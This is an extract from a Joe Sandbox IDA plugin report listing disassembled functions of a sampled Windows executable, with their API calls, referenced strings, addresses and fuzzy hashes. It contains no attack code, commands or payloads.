Function 00C49A63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0152E770,?), ref: 00C49AD2
ScreenToClient.USER32(00000002,00000002), ref: 00C49B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C49B72

Strings

@U=u, xrefs: 00C49BCD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 542be456a248ef3186015834069ea10fe50d4f0a5a214e7da45e09e947690295
Instruction ID: 04fcffe9b2230f9e1d8b5ffa3eb10e9c73f0d396a4dd9a7ea65ea7d8ee8029cd
Opcode Fuzzy Hash: 542be456a248ef3186015834069ea10fe50d4f0a5a214e7da45e09e947690295
Instruction Fuzzy Hash: C6512034A00219EFDF24DF68D981AAF7BB5FF55360F148259F8259B2A0D730AE41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C1DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C1DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C1DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C1DB8E

Strings

DllGetClassObject, xrefs: 00C1DB01

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: fd5d8909162f0ef0ff02051b0fb7900a62b330f6e007a7d9daf58ff93eddee0b
Instruction ID: 653fdcbcf7a366bfbc994b8c643bfb0242bd114b8cfa2a0ab75cf6716f71f87d
Opcode Fuzzy Hash: fd5d8909162f0ef0ff02051b0fb7900a62b330f6e007a7d9daf58ff93eddee0b
Instruction Fuzzy Hash: F0418FB1600208EFDB15CF55C884BDA7BA9EF46310F1580ADAD079F245D7B1DA84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C22C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C22CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00C22D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C86890,00000000), ref: 00C22D5A

Strings

0, xrefs: 00C22CA4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
Instruction ID: 8827af48d1f7440891cf57bd1cbb85d407f5ac3255b685c5fa2126d8ae90dd7a
Opcode Fuzzy Hash: 7d81aa91af000d692d91c2fd29e5ef5d2a2972991e1ec45077c1e7ea5c3d403c
Instruction Fuzzy Hash: 4941A235204352AFD720DF24E844B1AB7E8FF85320F14465EF965972A1DB70EA05CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C48AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C48B4D

Strings

@U=u, xrefs: 00C48B9C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: a77f9b2d61d8544b486995861c905034093ae0dbf73b017d506e2245775959f2
Instruction ID: ad8b4615eeac0c0e27b1144084f6787caf3602be1de38c9343305177263634fd
Opcode Fuzzy Hash: a77f9b2d61d8544b486995861c905034093ae0dbf73b017d506e2245775959f2
Instruction Fuzzy Hash: 5031D4B4640208BFEF259F28CC85FAD37A4FB06324F644516FA65D72E1CF30AA489B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C3DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3DAD9

Part of subcall function 00BC79AB: _memmove.LIBCMT ref: 00BC79F9

Strings

cdecl, xrefs: 00C3DB30
winapi, xrefs: 00C3DB4A
none, xrefs: 00C3DBB4
stdcall, xrefs: 00C3DB5B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 5abea7dc3b7ca30d35568f184763678708e567f7aaacb3e2c54424c78db70634
Instruction ID: df68eee70867e46483dd67e49712888c0a4c82d0439ce6c4491e01c8394ceef7
Opcode Fuzzy Hash: 5abea7dc3b7ca30d35568f184763678708e567f7aaacb3e2c54424c78db70634
Instruction Fuzzy Hash: 4F317070910619AFCF10EF54DC81AAEF3B4FF05324F108669E87697691DB71AA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C46656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C466D0
LoadLibraryW.KERNEL32(?), ref: 00C466D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C466EC
DestroyWindow.USER32(?), ref: 00C466F4

Strings

SysAnimate32, xrefs: 00C466AB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d4175082829ec20ca4571dc12a74b958458d17a50d6c8428ca95565fca9c887c
Instruction ID: 3e9667e77d5ebacc21a82b1acc7e0811c4b4c3734e80a5b2df677f0c2d56c6d5
Opcode Fuzzy Hash: d4175082829ec20ca4571dc12a74b958458d17a50d6c8428ca95565fca9c887c
Instruction Fuzzy Hash: 8821CAB1200206ABEF104F64EC80FFB37ADFB1A368F124629F961921A4C771CC51A762

Uniqueness

Uniqueness Score: -1.00%

Function 00C2703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C2705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C27091
GetStdHandle.KERNEL32(0000000C), ref: 00C270A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C270DD

Strings

nul, xrefs: 00C270D8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6239bb433610c5bc8a316c7d0e7874ec952dac47595dbab5c5c3f5e84218560e
Instruction ID: 36ad5d1c118e35c29428a867707a04f5504e9f16940ab07ebbb5347ef0040974
Opcode Fuzzy Hash: 6239bb433610c5bc8a316c7d0e7874ec952dac47595dbab5c5c3f5e84218560e
Instruction Fuzzy Hash: A2217C74504229ABDF209F69EC45B9E7BA8BF45720F204B29F8B0D76D0E7B099448B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C2712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C2715D
GetStdHandle.KERNEL32(000000F6), ref: 00C2716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C271A8

Strings

nul, xrefs: 00C271A3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c292e911ba5e4495ed03defe9f5d28044fe1762f5be997f8132b0dfb61d4cfba
Instruction ID: 78e9ada0ba31e7f9b2452f10241c2180a45e6f639184a98267904bb6c36251ec
Opcode Fuzzy Hash: c292e911ba5e4495ed03defe9f5d28044fe1762f5be997f8132b0dfb61d4cfba
Instruction Fuzzy Hash: 8D21D3755042259BDF209F69AC84B9EB7E8BF45320F200719FCB4D36D0D7709961CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C2AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C2AF13
__swprintf.LIBCMT ref: 00C2AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C4F910), ref: 00C2AF6A

Strings

%lu, xrefs: 00C2AF26

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 180c624aa1be0ca39272b2e10ea2cfdfbafc389d2ade061a94ea3010935948e1
Instruction ID: ede8acdc2c34a2dcbf51869eb2e5f0af06b16451c178c27b4fe55baafa7b8cc8
Opcode Fuzzy Hash: 180c624aa1be0ca39272b2e10ea2cfdfbafc389d2ade061a94ea3010935948e1
Instruction Fuzzy Hash: 91217135A00109AFDB10DF65D985EAE7BF8FF89704B0040A9F909EB251DB71EE45DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

Part of subcall function 00C1A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C1A399
Part of subcall function 00C1A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1A3AC
Part of subcall function 00C1A37C: GetCurrentThreadId.KERNEL32 ref: 00C1A3B3
Part of subcall function 00C1A37C: AttachThreadInput.USER32(00000000), ref: 00C1A3BA

GetFocus.USER32 ref: 00C1A554

Part of subcall function 00C1A3C5: GetParent.USER32(?), ref: 00C1A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00C1A59D
EnumChildWindows.USER32(?,00C1A615), ref: 00C1A5C5
__swprintf.LIBCMT ref: 00C1A5DF

Strings

%s%d, xrefs: 00C1A5D9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: efaba94696dfc8745289384ac9594bf3ce12e4c0f38a80fe5f66f6038044b99c
Instruction ID: 53937f68c2fa4f19cd05b09f15c2c08e45b733fc9cf170a8382b828b5ff2fdc0
Opcode Fuzzy Hash: efaba94696dfc8745289384ac9594bf3ce12e4c0f38a80fe5f66f6038044b99c
Instruction Fuzzy Hash: EA11B7B16412047BDF107F71DC85FFE37BCAF4A700F044079B9189A152CA709985AB75

Uniqueness

Uniqueness Score: -1.00%

Function 00C22017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C22048

Strings

REMOVE, xrefs: 00C2204E
EXISTS, xrefs: 00C22070
KEYS, xrefs: 00C2205F
APPEND, xrefs: 00C22081

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 5d0899a1e26d8e1da5bb5863971cf0af67aa97c28882b74797b30b59016708e9
Instruction ID: f76023396f7b9dec4dc4b0a3c667f5c50a79652543c3600588e28ec984ee8e3e
Opcode Fuzzy Hash: 5d0899a1e26d8e1da5bb5863971cf0af67aa97c28882b74797b30b59016708e9
Instruction Fuzzy Hash: 86116D70910159EFCF00EFA4D8819EEB7F4FF15304B5084A8E865A7252EB326A06DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C3F07E
CloseHandle.KERNEL32(?), ref: 00C3F0FF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: febdf1e7d22f8ef482252ebb943dcc1cb3da004175ff5ac7d5c353964abe76e4
Instruction ID: 6f4772e940b0184dfef77700d73ab9927b7e219505b61b543720b7f2ef3ec041
Opcode Fuzzy Hash: febdf1e7d22f8ef482252ebb943dcc1cb3da004175ff5ac7d5c353964abe76e4
Instruction Fuzzy Hash: 328182716107019FE720DF29C846F6EB7E5AF48B10F04886DF599DB392DBB0AD418B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C402C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Part of subcall function 00C410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C40038,?,?), ref: 00C410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C403C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C4040E
RegCloseKey.ADVAPI32(?,?), ref: 00C4043A
RegCloseKey.ADVAPI32(00000000), ref: 00C40447

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 275d35a5766ee2d8df431afa248bb51cff733a38c9173e2ca47dc5ea6dcf8828
Instruction ID: 4601d3f4faeefec303e3ad28e6fd4fdbcc559bcc2a67ce35ce6474d3325c052d
Opcode Fuzzy Hash: 275d35a5766ee2d8df431afa248bb51cff733a38c9173e2ca47dc5ea6dcf8828
Instruction Fuzzy Hash: A5515A31208204AFD704EF64D885F6EB7E8FF84304F14896EB696872A1DB31ED05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C3DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00C3DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C3DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00C3DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C3DD35

Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27B20,?,?,00000000), ref: 00BC5B8C
Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27B20,?,?,00000000,?,?), ref: 00BC5BB0

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: b88ac8366253628afb02a30ee03c90ab8c2bece4f7bb6dbe67b366c2e06f05f4
Instruction ID: a9ac5518d330fa2e97ea967764e1e6d4cc3b1126ee264ae57f5b47ee24685f9e
Opcode Fuzzy Hash: b88ac8366253628afb02a30ee03c90ab8c2bece4f7bb6dbe67b366c2e06f05f4
Instruction Fuzzy Hash: A7511B75A10205DFDB10EF68D484EADB7F4FF59310B1580A9E81AAB311DB70AE45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00C2E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C2E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C2E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C2E8F2

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C2E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C2E91F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: e40e5b0fff5b1330c8e7a039ef8e3165c5d983549dedf9e7e62c0c919b9f39de
Instruction ID: f9e51003521e7a86b5d32465fbfd646f940d7088d502f27f6589e13b0cc2f74a
Opcode Fuzzy Hash: e40e5b0fff5b1330c8e7a039ef8e3165c5d983549dedf9e7e62c0c919b9f39de
Instruction Fuzzy Hash: BA513839A00215DFDF10EF65C985EAEBBF5EF08310B1480A9E859AB362CB71ED51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BC2357
ScreenToClient.USER32(00C867B0,?), ref: 00BC2374
GetAsyncKeyState.USER32(00000001), ref: 00BC2399
GetAsyncKeyState.USER32(00000002), ref: 00BC23A7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
